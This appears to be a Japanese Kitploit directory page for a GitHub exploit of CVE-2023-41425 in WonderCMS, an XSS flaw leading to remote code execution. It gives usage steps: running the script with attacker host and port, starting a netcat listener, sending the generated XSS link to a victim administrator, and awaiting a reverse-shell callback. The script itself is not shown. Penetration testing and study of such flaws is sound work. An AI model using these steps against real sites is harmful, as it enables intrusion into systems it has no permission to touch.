Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - Wonder CMS v.3.2.0からv.3.4.2におけるクロスサイトスクリプティング脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードされた細工されたスクリプトを介して任意のコードを実行できる。 | Kitploit
ツール/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - Wonder CMS v.3.2.0からv.3.4.2におけるクロスサイトスクリプティング脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードされた細工されたスクリプトを介して任意のコードを実行できる。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
21年前未レビュー

CVE-2023-41425-wonderCMS_RCE

Wonder CMS v.3.2.0~v.3.4.2におけるクロスサイトスクリプティングの脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードした細工されたスクリプトを介して任意のコードを実行できる可能性があります。教育目的のみ

loginURLの知識、管理者アクセス権、または管理者にXSSリンクをクリックさせる能力が必要です。

  1. リポジトリをクローンする
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. 実行する
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. ローカルリスナーをセットアップする
root@kitploit:~
nc -lnvp 9001
  1. 出力されたXSS URLを被害者に送信するか、管理者アクセス権がある場合はクリックする
  2. コールバックを待つ

image

クレジット

脆弱性の発見と報告をしてくれたprodigiousMind https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

ツールをダウンロード